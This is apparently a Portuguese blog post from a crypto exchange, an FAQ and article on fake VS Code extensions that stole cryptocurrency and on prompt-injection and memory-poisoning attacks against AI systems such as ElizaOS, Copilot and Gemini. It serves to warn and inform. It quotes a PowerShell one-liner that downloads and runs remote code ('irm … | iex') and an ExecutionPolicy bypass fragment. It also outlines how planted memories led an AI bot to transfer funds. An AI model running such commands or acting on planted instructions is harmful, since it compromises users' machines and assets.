O que são extensões maliciosas no VS Code?

São extensões falsas publicadas no marketplace que se disfarçam de ferramentas legítimas mas contêm código malicioso para roubar dados, instalar malware ou drenar carteiras de criptomoedas.

Como o desenvolvedor russo perdeu $500.000 em crypto?

Ele instalou uma extensão falsa chamada 'Solidity Language' que parecia legítima com 54.000 downloads, mas instalou ferramentas de acesso remoto que permitiram aos atacantes drenar suas carteiras de criptomoedas.

O que é a técnica de prompt injection em IA?

É um método de manipular sistemas de IA através de instruções maliciosas disfarçadas em conversas aparentemente normais, fazendo a IA executar ações não autorizadas como transferir criptomoedas.

Como funcionou o ataque ao ElizaOS?

Pesquisadores de Princeton plantaram 'memórias falsas' em conversas do Discord, fazendo o bot de trading que gerencia $25+ milhões acreditar que havia instruções legítimas para transferir Ethereum.

O que é a vulnerabilidade EchoLeak do Microsoft Copilot?

Uma vulnerabilidade zero-click que permitia exfiltração automática de dados corporativos (emails, documentos, chats) sem interação do usuário, apenas por existir conteúdo malicioso no workspace.

Como identificar uma extensão VS Code maliciosa?

Verificar: publisher não verificado, poucos downloads reais, avaliações suspeitas, nomes similares a extensões legítimas, funcionalidades que não funcionam como prometido.

Quais foram as extensões maliciosas encontradas?

Incluem 'Solidity Language', 'solaibot', 'among-eth', 'blankebesxstnion', e várias outras disfarçadas de ferramentas para blockchain e desenvolvimento.

Como os atacantes manipularam o ranking do marketplace?

Inflaram artificialmente os números de download (até 2 milhões falsos), usaram nomes quase idênticos aos legítimos e manipularam algoritmos de busca para aparecer antes das versões reais.

O que é o ator de ameaças MUT-9332?

Um grupo de cibercriminosos rastreado pela Datadog que criou múltiplas extensões maliciosas visando desenvolvedores Solidity, anteriormente responsável por campanhas de cryptomining com milhões de downloads.

Como funciona o malware ScreenConnect?

Uma ferramenta de acesso remoto instalada pelas extensões maliciosas que dá aos atacantes controle total sobre o computador da vítima, permitindo roubo de dados e instalação de malware adicional.

Que dados são roubados pelos infostealers?

Senhas, cookies de navegador, chaves privadas de carteiras crypto, tokens do Discord, dados de login, informações de sessão e credenciais de desenvolvimento.

Como estados-nação usam ataques ClickFix?

Hackers da Rússia, Irã e Coreia do Norte criam páginas CAPTCHA falsas que pedem para 'verificar se você é humano' executando comandos maliciosos via Windows+R.

O que são caracteres invisíveis em repositórios?

Caracteres ocultos inseridos em código que sabotam assistentes de IA, fazendo com que gerem código com backdoors ou vulnerabilidades sem que desenvolvedores percebam.

Como o GitHub Copilot foi comprometido?

Através de prompt injection, gerando código malicioso que parecia legítimo para revisores humanos, e via extensões de navegador que injetavam comandos fantasma nas conversações.

Qual foi a resposta da Microsoft às extensões maliciosas?

Microsoft remove extensões quando identificadas e bloqueia publishers, mas o sistema permanece reativo dependendo de relatórios da comunidade para detecção.

Como funciona o envenenamento de repositórios?

Atacantes inserem código malicioso em repositórios públicos que será usado para treinar futuros modelos de IA, corrompendo as 'lições' que os bots aprenderão.

O que é a técnica de spotlighting para defesa?

Uma defesa que intercala tokens de controle no conteúdo e instrui o modelo a não confiar em instruções contidas nesses tokens, mas falha contra ataques adaptativos.

Como identificar publishers não verificados?

Verificar se o publisher tem o selo de verificação, se o domínio está verificado, histórico de publicações e se as extensões funcionam conforme descrito.

Quais são os sinais de download inflado?

Números de download desproporcionais ao tempo de publicação, crescimento muito rápido, poucos reviews genuínos e funcionalidades que não correspondem à popularidade alegada.

Como o Cursor AI foi comprometido?

Através do registro Open VSX que permite extensões compatíveis com VS Code, onde atacantes publicaram a extensão 'Solidity Language' falsa que instalou malware via PowerShell.

O que é a campanha de cryptomining MUT-9332?

Uma operação que distribuiu mineradores Monero através de extensões VS Code backdoored, alcançando até um milhão de downloads e visando especificamente desenvolvedores.

Como funcionam os ataques de memória persistente?

Informações maliciosas são plantadas em conversas que ficam na memória da IA entre sessões, sendo ativadas posteriormente quando condições específicas são atendidas.

Quais permissões as extensões VS Code têm?

Podem ler código e variáveis de ambiente, registrar comandos, modificar configurações e executar comandos do sistema como o usuário atual.

Como o Google Gemini foi atacado?

Começou a resumir emails com avisos de segurança falsos contendo números de phishing em texto branco invisível, fazendo usuários ligarem para golpistas.

O que são ataques adaptativos contra IA?

Ataques que evoluem especificamente para contornar defesas existentes, fazendo defesas baseadas em spotlighting falharem em mais de 55% dos casos.

Como prevenir ataques de extensões maliciosas?

Verificar publishers, ler reviews genuínos, testar funcionalidades, evitar extensões com poucos downloads, verificar código-fonte quando possível e usar antivírus atualizado.

O que é o framework CrAIBench?

Um framework de testes de Princeton que avalia defesas contra injeção de memória em IA, revelando que defesas avançadas falham em mais de 55% dos cenários.

Como funciona o malware VMDetector?

Um loader que detecta ambientes virtuais para evitar análise e instala múltiplos infostealers como Quasar RAT e PureLogs para roubo de dados e controle remoto.

Quais dados corporativos foram vazados pelo EchoLeak?

Logs de chat, arquivos OneDrive, documentos SharePoint, mensagens Teams, rascunhos de email, memos internos, dados de clientes e registros financeiros.

Como distinguir extensões legítimas de falsas?

Extensões legítimas têm publishers verificados, funcionam conforme anunciado, têm reviews genuínos e histórico consistente. Falsas têm funcionalidades quebradas e comportamento suspeito.

O que são comandos PowerShell ocultos?

Scripts maliciosos codificados em Base64 dentro de extensões que baixam e executam payloads adicionais, como 'irm https://solidity.bot/a.txt | iex'.

Como os atacantes contornam o Windows Defender?

Criam diretórios excluídos do monitoramento, desabilitam serviços de segurança, modificam configurações de recuperação e usam técnicas de DLL hijacking.

O que é técnica de esteganografia pseudo?

Ocultar payloads maliciosos como texto codificado Base64 dentro de arquivos de imagem hospedados em sites como Internet Archive para evitar detecção.

Como funcionam os classificadores de injeção de prompt?

Filtros avançados da Microsoft que tentam detectar instruções maliciosas antes de comprometer o Copilot, mas podem ser contornados com frases específicas.

Qual o impacto dos ataques de cadeia de suprimentos?

Comprometem ferramentas confiáveis usadas por milhares de desenvolvedores, permitindo ataques em massa e propagação de malware através de repositórios populares.

Como identificar tokens de Discord roubados?

Verifique atividade suspeita na conta, logins de locais desconhecidos, mensagens não enviadas por você e mude a senha imediatamente se detectar compromisso.

O que são extensões de navegador maliciosas?

Add-ons que modificam DOM das páginas web para injetar comandos ocultos em conversas com chatbots, operando como ventrílocos digitais sem conhecimento do usuário.

Como funciona o sequestro de sessão em chatbots?

Através de injeção de prompt em apenas 400 caracteres, atacantes podem assumir controle de sessões de chatbot como o da Lenovo para executar código malicioso.

Quais são os riscos do Open VSX registry?

Como alternativa ao Visual Studio Marketplace, tem menos verificações de segurança, permitindo que extensões maliciosas sejam publicadas mais facilmente.

Como atacantes exploram algoritmos de ranking?

Manipulam métricas como downloads, data de atualização e relevância para fazer extensões maliciosas aparecerem antes das legítimas nos resultados de busca.

O que é a técnica de gaslight digital?

Manipulação psicológica de sistemas IA através de informações falsas plantadas que fazem a IA acreditar em instruções fictícias como se fossem memórias reais.

Como funcionam os payloads de múltiplos estágios?

Infecção complexa onde o primeiro estágio baixa o segundo, que baixa o terceiro, criando redundância e dificultando detecção e análise completa do ataque.

Quais são os sinais de uma extensão comprometida?

Funcionalidades que não funcionam, consumo alto de CPU/memória, conexões de rede suspeitas, modificações não autorizadas no sistema e comportamento anômalo.

Como o malware estabelece persistência?

Modifica registry do Windows, cria tarefas agendadas, modifica atalhos de navegadores, desabilita recuperação do sistema e cria múltiplos pontos de reinicialização.

O que são ataques zero-click?

Ataques que não requerem interação do usuário, sendo ativados automaticamente apenas pela presença de conteúdo malicioso no ambiente de trabalho.

Como proteger carteiras de criptomoedas?

Use hardware wallets, mantenha chaves privadas offline, verifique todas as extensões instaladas, use antivírus e monitore transações regularmente.

Qual o papel da inteligência artificial em ataques?

IA pode ser tanto alvo quanto ferramenta de ataque, sendo manipulada para executar ações maliciosas ou usada para gerar código malicioso mais convincente.

Como funcionam os miners de Monero ocultos?

Usam recursos do computador para minerar criptomoeda em background, conectando-se a pools de mineração através de servidores C2 enquanto degradam performance do sistema.

O que são comandos de bypass de ExecutionPolicy?

Comandos PowerShell que contornam políticas de segurança do Windows para executar scripts maliciosos, como 'powershell -ExecutionPolicy Bypass -Command'.

Como identificar C2 servers maliciosos?

Monitorar conexões de rede suspeitas, domínios recém-registrados, tráfego criptografado anômalo e comunicações com IPs conhecidamente maliciosos.

Quais são as defesas mais eficazes atual?

Fine-tuning completo de modelos de IA para reconhecer conteúdo malicioso, mas requer reconstrução de sistemas de bilhões de parâmetros a cada nova ameaça.

BLOG

Prompts Invisíveis Vulnerabilidades em IA

BTC $0.00 +0.00%

ETH $0.00 +0.00%

SOL $0.00 +0.00%

TRX $0.00 +0.00%

TON $0.00 +0.00%

TRUMP $0.00 +0.00%

SHIB $0.00 +0.00%

BNB $0.00 +0.00%

XRP $0.00 +0.00%

USDT $0.00 +0.00%

DOGE $0.00 +0.00%

ADA $0.00 +0.00%

AVAX $0.00 +0.00%

DOT $0.00 +0.00%

MATIC $0.00 +0.00%

LINK $0.00 +0.00%

UNI $0.00 +0.00%

ATOM $0.00 +0.00%

LTC $0.00 +0.00%

ICP $0.00 +0.00%

Prompts Invisíveis Vulnerabilidades em IA

Como atacantes estão explorando vulnerabilidades em ferramentas de desenvolvimento de IA e extensões de código para roubar criptomoedas e dados corporativos.

Casos Principais Relatados:

1. O Golpe da Extensão Falsa do Solidity

Um desenvolvedor blockchain russo perdeu $500.000 em criptomoedas após instalar uma extensão falsa do VS Code

A extensão “Solidity Language” tinha 54.000 downloads e avaliações 5 estrelas, mas era completamente falsa

Os atacantes manipularam o marketplace usando nomes quase idênticos (“juanblanco” vs “juanbIanco”)

A extensão instalou ferramentas de acesso remoto que drenaram suas carteiras

2. Manipulação de IA – Caso ElizaOS

Pesquisadores de Princeton descobriram como “gasligtar” bots de IA que gerenciam mais de $25 milhões em ativos

Usando conversas aparentemente inocentes no Discord, plantaram “memórias falsas” no sistema Dias depois, conseguiram fazer o bot ElizaOS transferir Ethereum real para seus endereços

A IA foi convencida de que estava seguindo instruções legítimas anteriores

3. Vulnerabilidades Corporativas Massivas Microsoft Copilot:

Vulnerabilidade “EchoLeak” permitia roubo de dados sem interação do usuário

Google Gemini: Começou a gerar avisos de segurança falsos com números de phishing

GitHub Copilot: Podia ser enganado para gerar código malicioso que parecia legítimo

Lenovo: Chatbot de atendimento transformado em ferramenta de sequestro de sessão

Táticas dos Atacantes:

Envenenamento de Repositórios

Inserção de caracteres invisíveis em repositórios de código

Instruções maliciosas em arquivos de configuração

Corrupção do código-fonte que IA futura usará para treinamento

Criação de backdoors disfarçados como atualizações de otimização

Ataques Estatais

Hackers da Rússia, Irã e Coreia do Norte usando páginas CAPTCHA falsas

Técnica “ClickFix” – pedidos aparentemente inocentes para “verificar se você é humano”

Transformação da área de transferência em playground de execução remota

Defesas Atuais (E Suas Falhas):

Contramedidas Implementadas

Microsoft: “Classificadores de injeção de prompt” (detectores de spam avançados)

Academia: Técnica “spotlighting” com tokens de controle

Princeton: Framework CrAIBench para testes de estresse

Taxa de Falha das Defesas

Defesas de ponta falharam mais de 55% das vezes

Atacantes criam contornos em semanas para cada nova defesa

Técnicas de evasão reduzem taxas de detecção em até 100%

Ferramentas de produtividade comprometidas

Modelos de IA que não sabem dizer “não”

Confiança cega em extensões e marketplace

Automação que facilita tanto o desenvolvimento quanto o hacking

A questão final: Se nossas ferramentas não podem mais ser confiáveis, o que exatamente estamos construindo?

Este caso demonstra como atacantes evoluíram de explorar contratos inteligentes para comprometer toda a cadeia de ferramentas de desenvolvimento, transformando a própria infraestrutura de produtividade em vetor de ataque.

Resposta Oficial da Microsoft/VS Code

Ações Imediatas Tomadas:

Remoção das Extensões: Microsoft removeu as extensões maliciosas e bloqueou os publishers do Visual Studio Code marketplace Malicious Microsoft VS Code Extensions Used in Cryptojacking Campaign – Infosecurity Magazine
Declaração Oficial: Um porta-voz da Microsoft disse que “as extensões foram removidas e o publisher foi bloqueado do Visual Studio Code marketplace” e “não há ação necessária dos usuários” Malicious Microsoft VS Code Extensions Used in Cryptojacking Campaign – Infosecurity Magazine
Processo de Divulgação Responsável: Após divulgação responsável à Microsoft, a extensão foi removida do VS Code Extensions Marketplace Malicious Pull Request Targets 6,000+ Developers via Vulnerable Ethcode VS Code Extension

Limitações do Sistema Atual:

Verificação de Publisher Insuficiente: Pesquisadores notaram que “a verificação de publisher é uma boa prática para garantir que o publisher é quem diz ser”, mas “o processo de verificação de publisher do VSCode não é rigoroso o suficiente” Warning to developers: Stay away from these 10 VSCode extensions | CSO Online
Detecção Reativa: A Microsoft removeu várias extensões maliciosas do Marketplace nos últimos meses, incluindo dez extensões que faziam parte de uma campanha significativa para entregar um cryptominer Monero e foram baixadas cumulativamente até um milhão de vezes

Leia também: Comprar SOLANA no PIX

Fuga de Investidores dos EUA Beneficia Mercados Emergentes: Brasil Lidera Alta em 2026

Nova Zelândia Vai Ensinar Bitcoin e Criptomoedas nas Escolas

Bancos Digitais Sem FGC: Quais São e Por Que Você Deve Se Preocupar [2026]

Golpes do Will Bank 2026: Como Se Proteger

Banco Central Esmaga Fintechs com Licenças de R$ 37 Milhões Enquanto Protegia o Banco Master no Maior Roubo da História do Brasil

Bot telegram PREÇO ALERTA ATH GRÁTIS

Negociar

Começar

Sobre Nós

Informações Legais

A maior casa de câmbio de criptomoedas do Brasil.

Bitcoin P2P Servicos Digitais LTDA – 31.600.396/0001-31 – Florianópolis/SC/Brasil

In Crypto We Trust. 2016-2026

Bitcoin, Solana, USDT e PIX.

BLOG

Prompts Invisíveis Vulnerabilidades em IA

Como atacantes estão explorando vulnerabilidades em ferramentas de desenvolvimento de IA e extensões de código para roubar criptomoedas e dados corporativos.

Casos Principais Relatados:

1. O Golpe da Extensão Falsa do Solidity

Um desenvolvedor blockchain russo perdeu $500.000 em criptomoedas após instalar uma extensão falsa do VS Code

A extensão “Solidity Language” tinha 54.000 downloads e avaliações 5 estrelas, mas era completamente falsa

Os atacantes manipularam o marketplace usando nomes quase idênticos (“juanblanco” vs “juanbIanco”)

A extensão instalou ferramentas de acesso remoto que drenaram suas carteiras

2. Manipulação de IA – Caso ElizaOS

Pesquisadores de Princeton descobriram como “gasligtar” bots de IA que gerenciam mais de $25 milhões em ativos

Usando conversas aparentemente inocentes no Discord, plantaram “memórias falsas” no sistema Dias depois, conseguiram fazer o bot ElizaOS transferir Ethereum real para seus endereços

A IA foi convencida de que estava seguindo instruções legítimas anteriores

3. Vulnerabilidades Corporativas Massivas Microsoft Copilot:

Vulnerabilidade “EchoLeak” permitia roubo de dados sem interação do usuário

Google Gemini: Começou a gerar avisos de segurança falsos com números de phishing

GitHub Copilot: Podia ser enganado para gerar código malicioso que parecia legítimo

Lenovo: Chatbot de atendimento transformado em ferramenta de sequestro de sessão

Táticas dos Atacantes:

Envenenamento de Repositórios

Inserção de caracteres invisíveis em repositórios de código

Instruções maliciosas em arquivos de configuração

Corrupção do código-fonte que IA futura usará para treinamento

Criação de backdoors disfarçados como atualizações de otimização

Ataques Estatais

Hackers da Rússia, Irã e Coreia do Norte usando páginas CAPTCHA falsas

Técnica “ClickFix” – pedidos aparentemente inocentes para “verificar se você é humano”

Transformação da área de transferência em playground de execução remota

Defesas Atuais (E Suas Falhas):

Contramedidas Implementadas

Microsoft: “Classificadores de injeção de prompt” (detectores de spam avançados)

Academia: Técnica “spotlighting” com tokens de controle

Princeton: Framework CrAIBench para testes de estresse

Taxa de Falha das Defesas

Defesas de ponta falharam mais de 55% das vezes

Atacantes criam contornos em semanas para cada nova defesa

Técnicas de evasão reduzem taxas de detecção em até 100%

Ferramentas de produtividade comprometidas

Modelos de IA que não sabem dizer “não”

Confiança cega em extensões e marketplace

Automação que facilita tanto o desenvolvimento quanto o hacking

A questão final: Se nossas ferramentas não podem mais ser confiáveis, o que exatamente estamos construindo?

Este caso demonstra como atacantes evoluíram de explorar contratos inteligentes para comprometer toda a cadeia de ferramentas de desenvolvimento, transformando a própria infraestrutura de produtividade em vetor de ataque.

Resposta Oficial da Microsoft/VS Code

Ações Imediatas Tomadas:

Limitações do Sistema Atual:

Mais lidas:

Fuga de Investidores dos EUA Beneficia Mercados Emergentes: Brasil Lidera Alta em 2026

Nova Zelândia Vai Ensinar Bitcoin e Criptomoedas nas Escolas

Bancos Digitais Sem FGC: Quais São e Por Que Você Deve Se Preocupar [2026]

Golpes do Will Bank 2026: Como Se Proteger

Banco Central Esmaga Fintechs com Licenças de R$ 37 Milhões Enquanto Protegia o Banco Master no Maior Roubo da História do Brasil

Bot telegram PREÇO ALERTA ATH GRÁTIS

📈 Receba novidades sobre o criptomercado

📧 Confirmar código do email

✅ Inscrito com Sucesso!

Negociar

Começar

Sobre Nós

Informações Legais